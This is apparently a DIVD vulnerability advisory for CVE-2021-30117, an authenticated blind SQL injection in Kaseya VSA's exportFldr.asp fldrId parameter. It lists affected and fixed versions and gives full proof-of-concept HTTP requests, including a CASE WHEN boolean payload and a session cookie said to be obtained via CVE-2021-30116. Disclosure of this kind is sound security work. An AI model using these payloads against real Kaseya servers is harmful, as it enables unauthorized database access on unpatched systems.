Skip to the content.

CVE-2021-30117 - Authenticated SQL injection in Kaseya VSA < v9.5.6

CVE CVE-2021-30117
Case DIVD-2021-00011
Discovered by
Credits
Products Kaseya:
  • Kaseya VSA (on premise and SaaS)
  • Kaseya VSA Agent
Versions Kaseya:
  • Kaseya VSA (on premise and SaaS)
    • 9.x (< 9.5.6)
  • Kaseya VSA Agent
    • 9.x (< 9.5.0.23)
CVSS Base score: 9.8
References
Solution SaaS version has been fixed by the vendor Onpremise Upgrade the server to version 9.5.6 or above Upgrade the agent to version 9.5.0.23 or above
Last modified 08 Dec 2022 16:28

Description

The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Detailed description

Given the following request:

GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861;  agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;

Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.

Response:

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881
 
<!DOCTYPE html>
<HTML>
 
<HEAD>
 	<title>Whoops.</title>
        <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
 
 
	<link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link>
 
----SNIP----

However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.

Request:

GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861;  agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;

Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960
 
 
<html>
<head>
<title>Export Folder</title>
<style>
------ SNIP ----- 

JSON version